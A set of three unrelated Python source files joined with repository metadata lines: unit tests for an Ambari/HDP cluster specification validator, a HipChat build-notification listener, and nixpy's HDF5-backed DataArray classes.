cluster, [user_user_input, pwd_user_input])
ambari_service = next(service for service in cluster_config.services
if service.name == 'AMBARI')
users = ambari_service.users
self.assertEqual(1, len(users))
self.assertEqual('new-admin_user', users[0].name)
self.assertEqual('new-admin_pwd', users[0].password)
def test_validate_missing_hdfs(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["TASKTRACKER", "MAPREDUCE_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["JOBTRACKER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing hdfs service
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.RequiredServiceMissingException:
# expected
pass
def test_validate_missing_mr(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["NAMENODE"])
node_group2 = TestNodeGroup(
'master', [server2], ["DATANODE"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing mr service
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.RequiredServiceMissingException:
# expected
pass
def test_validate_missing_ambari(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["NAMENODE", "JOBTRACKER"])
node_group2 = TestNodeGroup(
'master', [server2], ["DATANODE", "TASKTRACKER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing ambari service
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.RequiredServiceMissingException:
# expected
pass
# TODO(jspeidel): move validate_* to test_services when validate
# is called independently of cluspterspec
def test_validate_hdfs(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"HDFS_CLIENT", "MAPREDUCE_CLIENT"], 1)
node_group2 = TestNodeGroup(
'master', [server2], ["JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing NN
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 NN
node_group3 = TestNodeGroup(
'master2', [server2], ["NAMENODE"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_mr(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"HDFS_CLIENT", "MAPREDUCE_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing JT
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 JT
node_group3 = TestNodeGroup(
'master', [server2], ["JOBTRACKER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
# should cause validation exception due to 2 NN
node_group3 = TestNodeGroup(
'master', [server2], ["NAMENODE"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
# should fail due to no TT
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "HDFS_CLIENT",
"MAPREDUCE_CLIENT"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing JT
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_hive(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"HIVE_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing hive_server
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"HIVE_SERVER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 HIVE_SERVER
node_group3 = TestNodeGroup(
'master', [server2], ["HIVE_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_zk(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
server3 = base.TestServer('host3', 'master', '11113', 3,
'111.11.1113', '222.22.2224')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"ZOOKEEPER_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing ZOOKEEPER_SERVER
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"ZOOKEEPER_SERVER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should allow multiple ZOOKEEPER_SERVER processes
node_group3 = TestNodeGroup(
'zkserver', [server3], ["ZOOKEEPER_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
cluster_config.create_operational_config(cluster, [])
def test_validate_oozie(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"OOZIE_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing OOZIE_SERVER
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"OOZIE_SERVER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 OOZIE_SERVER
node_group3 = TestNodeGroup(
'master', [server2], ["OOZIE_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_ganglia(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"GANGLIA_MONITOR"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing GANGLIA_SERVER
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"GANGLIA_SERVER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 GANGLIA_SERVER
node_group3 = TestNodeGroup(
'master2', [server2], ["GANGLIA_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_ambari(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing AMBARI_SERVER
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 AMBARI_SERVER
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
node_group3 = TestNodeGroup(
'master', [server2], ["AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_scaling_existing_ng(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# sanity check that original config validates
cluster_config.create_operational_config(cluster, [])
cluster_config = base.create_clusterspec()
scaled_groups = {'master': 2}
# should fail due to 2 JT
try:
cluster_config.create_operational_config(
cluster, [], scaled_groups)
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_scale(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# sanity check that original config validates
cluster_config.create_operational_config(cluster, [])
slave_ng = cluster_config.node_groups['slave']
self.assertEqual(1, slave_ng.count)
cluster_config.scale({'slave': 2})
self.assertEqual(2, slave_ng.count)
def test_get_deployed_configurations(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# sanity check that original config validates
cluster_config.create_operational_config(cluster, [])
configs = cluster_config.get_deployed_configurations()
expected_configs = set(['mapred-site', 'ambari', 'hdfs-site',
'global', 'core-site'])
self.assertEqual(expected_configs, expected_configs & configs)
def test_get_deployed_node_group_count(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
slave_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER"])
slave2_group = TestNodeGroup(
'slave2', [server], ["DATANODE", "TASKTRACKER"])
master_group = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([master_group, slave_group, slave2_group])
cluster_config = base.create_clusterspec()
cluster_config.create_operational_config(cluster, [])
self.assertEqual(2, cluster_config.get_deployed_node_group_count(
'DATANODE'))
self.assertEqual(1, cluster_config.get_deployed_node_group_count(
'AMBARI_SERVER'))
def test_get_node_groups_containing_component(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
slave_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER"])
slave2_group = TestNodeGroup(
'slave2', [server], ["DATANODE", "TASKTRACKER"])
master_group = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([master_group, slave_group, slave2_group])
cluster_config = base.create_clusterspec()
cluster_config.create_operational_config(cluster, [])
datanode_ngs = cluster_config.get_node_groups_containing_component(
'DATANODE')
self.assertEqual(2, len(datanode_ngs))
ng_names = set([datanode_ngs[0].name, datanode_ngs[1].name])
self.assertIn('slave', ng_names)
self.assertIn('slave2', ng_names)
def test_get_components_for_type(self, patched):
cluster_config = base.create_clusterspec()
clients = cluster_config.get_components_for_type('CLIENT')
slaves = cluster_config.get_components_for_type('SLAVE')
masters = cluster_config.get_components_for_type('MASTER')
expected_clients = set(['HCAT', 'ZOOKEEPER_CLIENT',
'MAPREDUCE_CLIENT', 'HIVE_CLIENT',
'HDFS_CLIENT', 'PIG'])
self.assertEqual(expected_clients, expected_clients & set(clients))
expected_slaves = set(['AMBARI_AGENT', 'TASKTRACKER', 'DATANODE',
'GANGLIA_MONITOR'])
self.assertEqual(expected_slaves, expected_slaves & set(slaves))
expected_masters = set(['SECONDARY_NAMENODE', 'HIVE_METASTORE',
'AMBARI_SERVER', 'JOBTRACKER',
'WEBHCAT_SERVER', 'NAGIOS_SERVER',
'MYSQL_SERVER', 'ZOOKEEPER_SERVER',
'NAMENODE', 'HIVE_SERVER', 'GANGLIA_SERVER'])
self.assertEqual(expected_masters, expected_masters & set(masters))
def _assert_services(self, services):
found_services = []
for service in services:
name = service.name
found_services.append(name)
self.service_validators[name](service)
self.assertEqual(13, len(found_services))
self.assertIn('HDFS', found_services)
self.assertIn('MAPREDUCE', found_services)
self.assertIn('GANGLIA', found_services)
self.assertIn('NAGIOS', found_services)
self.assertIn('AMBARI', found_services)
self.assertIn('PIG', found_services)
self.assertIn('HIVE', found_services)
self.assertIn('HCATALOG', found_services)
self.assertIn('ZOOKEEPER', found_services)
self.assertIn('WEBHCAT', found_services)
self.assertIn('OOZIE', found_services)
self.assertIn('SQOOP', found_services)
self.assertIn('HBASE', found_services)
def _assert_hdfs(self, service):
self.assertEqual('HDFS', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(4, len(found_components))
self._assert_component('NAMENODE', 'MASTER', "1",
found_components['NAMENODE'])
self._assert_component('DATANODE', 'SLAVE', "1+",
found_components['DATANODE'])
self._assert_component('SECONDARY_NAMENODE', 'MASTER', "1",
found_components['SECONDARY_NAMENODE'])
self._assert_component('HDFS_CLIENT', 'CLIENT', "1+",
found_components['HDFS_CLIENT'])
# TODO(jspeidel) config
def _assert_mr(self, service):
self.assertEqual('MAPREDUCE', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(4, len(found_components))
self._assert_component('JOBTRACKER', 'MASTER', "1",
found_components['JOBTRACKER'])
self._assert_component('TASKTRACKER', 'SLAVE', "1+",
found_components['TASKTRACKER'])
self._assert_component('MAPREDUCE_CLIENT', 'CLIENT', "1+",
found_components['MAPREDUCE_CLIENT'])
self._assert_component('HISTORYSERVER', 'MASTER', "1",
found_components['HISTORYSERVER'])
# TODO(jspeidel) config
def _assert_nagios(self, service):
self.assertEqual('NAGIOS', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(1, len(found_components))
self._assert_component('NAGIOS_SERVER', 'MASTER', "1",
found_components['NAGIOS_SERVER'])
def _assert_ganglia(self, service):
self.assertEqual('GANGLIA', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(2, len(found_components))
self._assert_component('GANGLIA_SERVER', 'MASTER', "1",
found_components['GANGLIA_SERVER'])
self._assert_component('GANGLIA_MONITOR', 'SLAVE', "1+",
found_components['GANGLIA_MONITOR'])
def _assert_ambari(self, service):
self.assertEqual('AMBARI', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(2, len(found_components))
self._assert_component('AMBARI_SERVER', 'MASTER', "1",
found_components['AMBARI_SERVER'])
self._assert_component('AMBARI_AGENT', 'SLAVE', "1+",
found_components['AMBARI_AGENT'])
self.assertEqual(1, len(service.users))
user = service.users[0]
self.assertEqual('admin', user.name)
self.assertEqual('admin', user.password)
groups = user.groups
self.assertEqual(1, len(groups))
self.assertIn('admin', groups)
def _assert_pig(self, service):
self.assertEqual('PIG', service.name)
self.assertEqual(1, len(service.components))
self.assertEqual('PIG', service.components[0].name)
def _assert_hive(self, service):
self.assertEqual('HIVE', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(4, len(found_components))
self._assert_component('HIVE_SERVER', 'MASTER', "1",
found_components['HIVE_SERVER'])
self._assert_component('HIVE_METASTORE', 'MASTER', "1",
found_components['HIVE_METASTORE'])
self._assert_component('MYSQL_SERVER', 'MASTER', "1",
found_components['MYSQL_SERVER'])
self._assert_component('HIVE_CLIENT', 'CLIENT', "1+",
found_components['HIVE_CLIENT'])
def _assert_hcatalog(self, service):
self.assertEqual('HCATALOG', service.name)
self.assertEqual(1, len(service.components))
self.assertEqual('HCAT', service.components[0].name)
def _assert_zookeeper(self, service):
self.assertEqual('ZOOKEEPER', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(2, len(found_components))
self._assert_component('ZOOKEEPER_SERVER', 'MASTER', "1+",
found_components['ZOOKEEPER_SERVER'])
self._assert_component('ZOOKEEPER_CLIENT', 'CLIENT', "1+",
found_components['ZOOKEEPER_CLIENT'])
def _assert_webhcat(self, service):
self.assertEqual('WEBHCAT', service.name)
self.assertEqual(1, len(service.components))
self.assertEqual('WEBHCAT_SERVER', service.components[0].name)
def _assert_oozie(self, service):
self.assertEqual('OOZIE', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(2, len(found_components))
self._assert_component('OOZIE_SERVER', 'MASTER', "1",
found_components['OOZIE_SERVER'])
self._assert_component('OOZIE_CLIENT', 'CLIENT', "1+",
found_components['OOZIE_CLIENT'])
def _assert_sqoop(self, service):
self.assertEqual('SQOOP', service.name)
self.assertEqual(1, len(service.components))
self.assertEqual('SQOOP', service.components[0].name)
def _assert_hbase(self, service):
self.assertEqual('HBASE', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(3, len(found_components))
self._assert_component('HBASE_MASTER', 'MASTER', "1",
found_components['HBASE_MASTER'])
self._assert_component('HBASE_REGIONSERVER', 'SLAVE', "1+",
found_components['HBASE_REGIONSERVER'])
self._assert_component('HBASE_CLIENT', 'CLIENT', "1+",
found_components['HBASE_CLIENT'])
def _assert_component(self, name, comp_type, cardinality, component):
self.assertEqual(name, component.name)
self.assertEqual(comp_type, component.type)
self.assertEqual(cardinality, component.cardinality)
def _assert_configurations(self, configurations):
self.assertEqual(9, len(configurations))
self.assertIn('global', configurations)
self.assertIn('core-site', configurations)
self.assertIn('mapred-site', configurations)
self.assertIn('hdfs-site', configurations)
self.assertIn('ambari', configurations)
self.assertIn('webhcat-site', configurations)
self.assertIn('hive-site', configurations)
self.assertIn('oozie-site', configurations)
self.assertIn('hbase-site', configurations)
class TestNodeGroup(object):
def __init__(self, name, instances, node_processes, count=1):
self.name = name
self.instances = instances
for i in instances:
i.node_group = self
self.node_processes = node_processes
self.count = count
self.id = name
def storage_paths(self):
return ['']
class TestUserInputConfig(object):
def __init__(self, tag, target, name):
self.tag = tag
self.applicable_target = target
self.name = name
| apache-2.0 | -4,165,563,385,657,736,700 | 43.857235 | 79 | 0.563646 | false |
alex/changes | changes/listeners/hipchat.py | 1 | 3156 | import json
import logging
import requests
from flask import current_app
from changes.config import db
from changes.constants import Result, Status
from changes.models import Build, ProjectOption, Source
from changes.utils.http import build_uri
logger = logging.getLogger('hipchat')
DEFAULT_TIMEOUT = 1
API_ENDPOINT = 'https://api.hipchat.com/v1/rooms/message'
def get_options(project_id):
return dict(
db.session.query(
ProjectOption.name, ProjectOption.value
).filter(
ProjectOption.project_id == project_id,
ProjectOption.name.in_([
'hipchat.notify', 'hipchat.room',
])
)
)
def should_notify(build):
if build.result not in (Result.failed, Result.passed):
return
parent = Build.query.join(
Source, Source.id == Build.source_id,
).filter(
Source.patch_id == None, # NOQA
Source.revision_sha != build.source.revision_sha,
Build.project == build.project,
Build.date_created < build.date_created,
Build.status == Status.finished,
Build.result.in_([Result.passed, Result.failed]),
).order_by(Build.date_created.desc()).first()
if parent is None:
return build.result == Result.failed
if parent.result == build.result:
return False
return True
def build_finished_handler(build_id, **kwargs):
build = Build.query.get(build_id)
if build is None:
return
if build.source.patch_id:
return
if not current_app.config.get('HIPCHAT_TOKEN'):
return
if not should_notify(build):
return
options = get_options(build.project_id)
if options.get('hipchat.notify', '0') != '1':
return
if not options.get('hipchat.room'):
return
message = u'Build {result} - <a href="{link}">{project} #{number}</a> ({target})'.format(
number='{0}'.format(build.number),
result=unicode(build.result),
target=build.target or build.source.revision_sha or 'Unknown',
project=build.project.name,
link=build_uri('/projects/{0}/builds/{1}/'.format(
build.project.slug, build.id.hex))
)
if build.author:
message += ' - {author}'.format(
author=build.author.email,
)
send_payload(
token=current_app.config['HIPCHAT_TOKEN'],
room=options['hipchat.room'],
message=message,
notify=True,
color='green' if build.result == Result.passed else 'red',
)
def send_payload(token, room, message, notify, color='red',
timeout=DEFAULT_TIMEOUT):
data = {
'auth_token': token,
'room_id': room,
'from': 'Changes',
'message': message,
'notify': int(notify),
'color': color,
}
response = requests.post(API_ENDPOINT, data=data, timeout=timeout)
response_data = json.loads(response.content)
if 'status' not in response_data:
logger.error('Unexpected response: %s', response_data)
if response_data['status'] != 'sent':
logger.error('Event could not be sent to hipchat')
| apache-2.0 | 6,745,039,586,604,910,000 | 26.206897 | 93 | 0.611217 | false |
stoewer/nixpy | nixio/pycore/data_array.py | 1 | 8360 | # Copyright (c) 2016, German Neuroinformatics Node (G-Node)
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted under the terms of the BSD License. See
# LICENSE file in the root of the Project.
from numbers import Number
from .entity_with_sources import EntityWithSources
from ..data_array import DataArrayMixin, DataSetMixin
from ..value import DataType
from .dimensions import (SampledDimension, RangeDimension, SetDimension,
DimensionType)
from . import util
from .exceptions import InvalidUnit
class DataSet(DataSetMixin):
def _write_data(self, data, count, offset):
dataset = self._h5group.get_dataset("data")
dataset.write_data(data, count, offset)
def _read_data(self, data, count, offset):
dataset = self._h5group.get_dataset("data")
dataset.read_data(data, count, offset)
@property
def data_extent(self):
"""
The size of the data.
:type: set of int
"""
dataset = self._h5group.get_dataset("data")
return dataset.shape
@data_extent.setter
def data_extent(self, extent):
dataset = self._h5group.get_dataset("data")
dataset.shape = extent
@property
def data_type(self):
"""
The data type of the data stored in the DataArray. This is a read only
property.
:type: DataType
"""
return self._get_dtype()
def _get_dtype(self):
dataset = self._h5group.get_dataset("data")
return dataset.dtype
class DataArray(EntityWithSources, DataSet, DataArrayMixin):
def __init__(self, nixparent, h5group):
super(DataArray, self).__init__(nixparent, h5group)
@classmethod
def _create_new(cls, nixparent, h5parent, name, type_, data_type, shape):
newentity = super(DataArray, cls)._create_new(nixparent, h5parent,
name, type_)
newentity._h5group.create_dataset("data", shape, data_type)
return newentity
def _read_data(self, data, count, offset):
coeff = self.polynom_coefficients
origin = self.expansion_origin
if len(coeff) or origin:
if not origin:
origin = 0.0
super(DataArray, self)._read_data(data, count, offset)
util.apply_polynomial(coeff, origin, data)
else:
super(DataArray, self)._read_data(data, count, offset)
def append_set_dimension(self):
"""
Append a new SetDimension to the list of existing dimension
descriptors.
:returns: The newly created SetDimension.
:rtype: SetDimension
"""
dimgroup = self._h5group.open_group("dimensions")
index = len(dimgroup) + 1
return SetDimension._create_new(dimgroup, index)
def append_sampled_dimension(self, sampling_interval):
"""
Append a new SampledDimension to the list of existing dimension
descriptors.
:param sampling_interval: The sampling interval of the SetDimension
to create.
:type sampling_interval: float
:returns: The newly created SampledDimension.
:rtype: SampledDimension
"""
dimgroup = self._h5group.open_group("dimensions")
index = len(dimgroup) + 1
return SampledDimension._create_new(dimgroup, index, sampling_interval)
def append_range_dimension(self, ticks):
"""
Append a new RangeDimension to the list of existing dimension
descriptors.
:param ticks: The ticks of the RangeDimension to create.
:type ticks: list of float
:returns: The newly created RangeDimension.
:rtype: RangeDimension
"""
dimgroup = self._h5group.open_group("dimensions")
index = len(dimgroup) + 1
return RangeDimension._create_new(dimgroup, index, ticks)
def append_alias_range_dimension(self):
"""
Append a new RangeDimension that uses the data stored in this
DataArray as ticks. This works only(!) if the DataArray is 1-D and
the stored data is numeric. A ValueError will be raised otherwise.
:returns: The created dimension descriptor.
:rtype: RangeDimension
"""
if (len(self.data_extent) > 1 or
not DataType.is_numeric_dtype(self.dtype)):
raise ValueError("AliasRangeDimensions only allowed for 1D "
"numeric DataArrays.")
if self._dimension_count() > 0:
raise ValueError("Cannot append additional alias dimension. "
"There must only be one!")
dimgroup = self._h5group.open_group("dimensions")
data = self._h5group.group["data"]
return RangeDimension._create_new(dimgroup, 1, data)
def delete_dimensions(self):
"""
Delete all the dimension descriptors for this DataArray.
"""
dimgroup = self._h5group.open_group("dimensions")
ndims = len(dimgroup)
for idx in range(ndims):
del dimgroup[str(idx+1)]
return True
def _dimension_count(self):
return len(self._h5group.open_group("dimensions"))
def _get_dimension_by_pos(self, index):
h5dim = self._h5group.open_group("dimensions").open_group(str(index))
dimtype = h5dim.get_attr("dimension_type")
if dimtype == DimensionType.Sample:
return SampledDimension(h5dim, index)
elif dimtype == DimensionType.Range:
return RangeDimension(h5dim, index)
elif dimtype == DimensionType.Set:
return SetDimension(h5dim, index)
else:
raise TypeError("Invalid Dimension object in file.")
@property
def dtype(self):
"""
The data type of the data stored in the DataArray.
This is a read only property.
:return: DataType
"""
return self._h5group.group["data"].dtype
@property
def polynom_coefficients(self):
"""
The polynomial coefficients for the calibration. By default this is
set to a {0.0, 1.0} for a linear calibration with zero offset.
This is a read-write property and can be set to None
:type: list of float
"""
return tuple(self._h5group.get_data("polynom_coefficients"))
@polynom_coefficients.setter
def polynom_coefficients(self, coeff):
if not coeff:
if self._h5group.has_data("polynom_coefficients"):
del self._h5group["polynom_coefficients"]
else:
dtype = DataType.Double
self._h5group.write_data("polynom_coefficients", coeff, dtype)
@property
def expansion_origin(self):
"""
The expansion origin of the calibration polynomial.
This is a read-write property and can be set to None.
The default value is 0.
:type: float
"""
return self._h5group.get_attr("expansion_origin")
@expansion_origin.setter
def expansion_origin(self, eo):
util.check_attr_type(eo, Number)
self._h5group.set_attr("expansion_origin", eo)
@property
def label(self):
"""
The label of the DataArray. The label corresponds to the label of the
x-axis of a plot. This is a read-write property and can be set to
None.
:type: str
"""
return self._h5group.get_attr("label")
@label.setter
def label(self, l):
util.check_attr_type(l, str)
